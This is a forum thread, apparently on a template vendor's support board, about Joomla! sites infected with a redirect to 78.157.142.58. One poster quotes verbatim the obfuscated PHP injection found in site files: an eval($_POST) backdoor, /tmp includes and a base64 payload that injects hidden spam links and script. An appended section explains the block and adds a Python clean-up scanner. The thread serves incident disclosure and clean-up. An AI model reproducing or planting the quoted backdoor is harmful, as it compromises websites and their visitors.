
Weird redirect to IP 78.157.142.58

    • Yves
    • Preeminent Rocketeer
    • Posts: 9214
    • Thanks: 5

    Re: Weird redirect to IP 78.157.142.58

    Posted 16 years 3 days ago
    • I think so, I reinstalled the latest version of the template this morning.
  • Re: Weird redirect to IP 78.157.142.58

    Posted 15 years 11 months ago
    • Okay, after a couple of days trying to figure out which files were attacked, I was able to locate the problem. The sites that were injected with this script are all Joomla! sites. There are two different ways the script was injected: one is for Joomla! 1.0 and the other for 1.5.

      Joomla! 1.0:

      A line of code is added to your DB; in my case it was in the "jos_mambots" table. The code looks something like this:

      ../../../../../../../hsphere/local/home/youraccount/yourdomain.com/ - followed by the path of a file that was added to your web server.

      In some cases this code in your DB also calls a script on a different server. I have even visited the sites whose domains I found in the database, and they look like sites that were also attacked.

      Files on your server can be anywhere: an image file, a third-party extension, or a Joomla! core file.

      Removing this from your DB and deleting the file from your server (if it is located there) will fix the problem.

      Joomla! 1.5

      This one is more complicated and I would recommend that you ask your host to restore your files from an earlier date. I downloaded the files locally and in BBEdit did a search for the following code:

      <?php if(!function_exists('tmp_lkojfghx')){for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST))eval($_POST);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PGRpdiBzdHlsZT0ncG9zaXRpb246YWJz
      b2x1dGU7IGxlZnQ6LTEwMDBweDsgdG9wOi0xMDAwcHg7Jz5FcmVjdGlsZSBkeXNmdW5jdGlvbiBmb3J1bXMgPGE
      gaHJlZj1odHRwOi8vd3d3LnlvdXR1YmUuY29tL3RyYXh0ZW5iZXJnNTU1IFRBUkdFVD1fYmxhbms+Y2hlYXAgZ2Vu
      ZXJpYyB2aWFncmE8L0E+LiA8QlIgLz4KQnV5IHZpYWdyYSBjaGVhcCBldmVyeW9uZSBrbm93cyB0aGF0IHByZXNj
      cmlwdGlvbiB2aWFncmEgPGEgaHJlZj1odHRwOi8vd3d3LmFuc3dlcmJhZy5jb20vcHJvZmlsZS8/aWQ9MzEwMTY4IF
      RBUkdFVD1fYmxhbms+QnV5IHZpYWdyYSBmb3IgbG93ZXN0IHByaWNlczwvQT4uIDxCUiAvPgpWaWFncmEgd2l
      sbCBub3QgbWFrZSB5b3VyIHBlbmlzIGdyb3cgYW55IGxhcmdlciBwZXJoYXBzIHlvdSBhbHJlYWR5IGhlYXIgYWJvdX
      QgZXJlY3RpbGUgZHlzZnVuY3Rpb24gZG9jdG9yIGluIGZhY3QsIG1lZGljYWwgYW5kIDxhIGhyZWY9aHR0cDovL2Z
      vcnVtLmx5Y29zLmRlL21lbWJlci5waHA/dT0yNjI4Mj52aWFncmEgYmVzdCBidXk8L0E+IDxCUiAvPgoKPHNjcmlwd
      D5pZih0eXBlb2YoeWFob29fY291bnRlcikhPXR5cGVvZigxKSlldmFsKHVuZXNjYXBlKCclNzYkJTYxPyU3MiAhJTYxYC
      UyQ2AlNjk/LCU1RiUzQiU2MT0kJTVCJTIyQCUzMT85JTMxLiQlMzF+MyQlMzMlMjJgJTJDJCUyMmAlMzFgJTM1JTM
      3YCUyRT8lMzIhJTMwPzIlMjIlMkMiMTUhOC5gOCUzOSMiLCUyMmAxOTEjJTJFJTM4NHwlMjJAJTVEISUzQj9fQCUz
      RCUzMSUzQn5pI2YoIyU2NCU2RmMjJTc1fG1lJTZFISU3NCUyRWMkJTZGJCU2RnxrfiU2OWVALiU2RCU2MSElNzRj
      aCUyOCMlMkZ+JTVDYiU2OGAlNjdgZiU3ND8lM0RAMSQlMkY/JTI5PyUzRCUzRGBuISU3NWwlNkMlMjlmb3IlMjglN
      jklM0R+MCUzQnxpYDx8NDshJTY5fiUyQiUyQiklNjQhJTZGY351QG1gJTY1fG5AdGAudyU3MkBpIXQlNjUlMjhAIj88
      cyU2MyQlNzIlNjkhJTcwJTc0fD4kJTY5JTY2JTI4QF8lMjkkJTY0PyU2RiQlNjMlNzUlNkQlNjV8bnQudyU3MiU2OX4lNz
      Q/JTY1figlNUMkJTIyJTNDJTczJTYzJTcyISU2OSMlNzAhdCUyMCU2OSQlNjR8PUBfIiUyQmkjKyUyMiQlNUYlMjAlNz
      MlNzJAJTYzJTNEJTJGLyUzNzYuJTMxNjMuYCIkJTJCfmF+W2AlNjklNUQhKyIlMkYkJTYzJTcwJTJGJTNFJTNDYCU1
      Qz8lNUN8L2AlNzNjJTcyI2klNzB0JTNFIyU1Q2AiJTI5QCUzQz8lNUMvc34lNjNAciU2OXAjJTc0IyUzRSUyMiUyOX47
      JykucmVwbGFjZSgvYHxAfFwkfH58XD98I3xcfHxcIS9nLCIiKSk7dmFyIHlhaG9vX2NvdW50ZXI9MTs8L3Njcmlwd
      D48L2Rpdj4K'));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));$s1=preg_replace(base64_decode('IzxkaXY
      gc3R5bGU9J3Bvc2l0aW9uOmFic29sdXRlOyBsZWZ0Oi0xMDAwcHg7IHRvcDotMTAwMHB4Oyc+Lis/PC9kaXY+Ci
      Nz'),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\
      1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJ
      OKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS)call_user_func($GLOBALS,$a,$b,$c,$d);foreach(@ob_get_s
      tatus(1) as $v)if(($a=$v)=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS=$a;tmp_lkojfghx2(); ?>

      It is injected at the end of the file and it calls a JavaScript located at this IP address (78.157.142.58).

      I just searched for <?php if(!function_exists('tmp_l and was able to locate the files and remove the code. After that everything worked great.

      But this code spreads really fast. In a few days one of my accounts had almost 500 files with this code - crazy. In this case my host helped. They wrote a FIND and REPLACE script on the server and were able to remove all of the code.

      I am not sure how they managed to do all this, but this is very serious and you need to act right away. Make sure to check the permissions on your site. Added files have 444 permissions.
    • Last Edit: 15 years 11 months ago by Dusan Vukasinovic.
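Added example, not part of the thread and not the host's actual script: a small clean-up scanner in Python modelled on the poster's BBEdit search string and on the host's find-and-replace approach. Reading the block quoted in the post above, the injected PHP registers an output-buffer callback (tmp_lkojfghx) that appends the base64-decoded hidden div (spam links plus a script) before </body>, includes the first /tmp/m1 .. /tmp/m99 file it finds, and contains an eval() on $_POST, so every copy is also a remote code execution backdoor, not only a redirect. The scanner strips each block that begins with the poster's signature string, flags the 0444 permissions the poster noted on added files, and checks jos_mambots rows for the ../../../hsphere/... path pattern from the Joomla! 1.0 case. The directory layout, the sample rows and the short stand-in payload are constructed for the demo; the real block is the one quoted in the post.

```python
"""Added example, not code from the thread: a clean-up scanner for the
tmp_lkojfghx injection described above. Paths, sample rows and the short
stand-in payload below are constructed for the demo."""
import re
import stat
import tempfile
from pathlib import Path

# The string the poster searched for in BBEdit; every injected block starts with it.
SIGNATURE = "<?php if(!function_exists('tmp_lkojfghx'))"

# One block runs from SIGNATURE to the next closing PHP tag. The quoted payload
# has no "?>" before its own end, so a non-greedy match stops in the right place;
# DOTALL because the base64 part is usually line-wrapped. The trailing newline is eaten too.
INJECT_RE = re.compile(re.escape(SIGNATURE) + r".*?\?>[ \t]*\r?\n?", re.DOTALL)

# Joomla! 1.0 vector: a jos_mambots row whose path climbs out of the web root
# (the post shows ../../../../../../../hsphere/local/home/...) or points at another host.
MAMBOT_BAD_RE = re.compile(r"(\.\./){2,}|^https?://|/hsphere/local/home/", re.IGNORECASE)

# Constructed stand-in with the same opening and closing tags and a harmless body;
# the real block is about 2 KB of base64 and PHP.
STAND_IN = SIGNATURE + "{define('TMP_XHGFJOKL','demo');}echo TMP_XHGFJOKL; ?>\n"
CLEAN_INDEX = "<?php\ndefine('_JEXEC', 1);\necho 'hello';\n"


def strip_injection(text):
    """Return (cleaned_text, blocks_removed)."""
    return INJECT_RE.subn("", text)


def suspicious_mambot_rows(rows):
    """rows: (id, element) pairs from jos_mambots; return the ids that look injected."""
    return [row_id for row_id, element in rows if MAMBOT_BAD_RE.search(element or "")]


def scan_tree(root, fix=False):
    """Report (path, blocks_found, is_mode_0444) for every file carrying SIGNATURE.
    All file types are scanned because the poster saw images and extensions hit.
    With fix=True the block is stripped, after making 0444 files writable."""
    findings = []
    for path in sorted(p for p in Path(root).rglob("*") if p.is_file()):
        text = path.read_bytes().decode("latin-1")  # latin-1 round-trips any bytes
        if SIGNATURE not in text:
            continue
        read_only = stat.S_IMODE(path.stat().st_mode) == 0o444
        cleaned, n = strip_injection(text)
        findings.append((path, n, read_only))
        if fix:
            if read_only:
                path.chmod(0o644)
            path.write_bytes(cleaned.encode("latin-1"))
    return findings


def demo():
    """Build a throw-away site with one infected PHP file, one infected 'image'
    (mode 0444) and one clean file, clean it, and return what happened."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "index.php").write_text(CLEAN_INDEX + STAND_IN)
        (root / "images").mkdir()
        logo = root / "images" / "logo.jpg"
        logo.write_bytes(b"\xff\xd8\xff\xe0JFIF" + STAND_IN.encode("latin-1"))
        logo.chmod(0o444)
        (root / "configuration.php").write_text(CLEAN_INDEX)

        infected = scan_tree(root, fix=True)
        remaining = scan_tree(root)
        rows = [  # constructed jos_mambots rows: one legitimate, two injected
            (1, "mosimage"),
            (2, "../../../../../../../hsphere/local/home/youraccount/yourdomain.com/images/x.php"),
            (3, "http://example.invalid/m.php"),
        ]
        return {
            "infected": sorted((p.name, n, ro) for p, n, ro in infected),
            "remaining": len(remaining),
            "index_clean": (root / "index.php").read_text() == CLEAN_INDEX,
            "bad_rows": suspicious_mambot_rows(rows),
        }


if __name__ == "__main__":
    print(demo())
```

Run scan_tree with fix=False first to get the list before touching anything. The pattern only strips blocks that begin with this exact signature, so a variant with a different function name needs its own pattern, and with hundreds of files hit the poster's advice to restore from a known-good backup is still the safer route, since the eval() on $_POST means the attacker may have dropped other files the signature will not catch.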
    • Ben Lee
    • Elite Rocketeer
    • Posts: 4193
    • Thanks: 42

    Re: Weird redirect to IP 78.157.142.58

    Posted 15 years 11 months ago
    • Thanks for posting your research!

      Always good to know what threats are out there and how to handle things if you get hit!
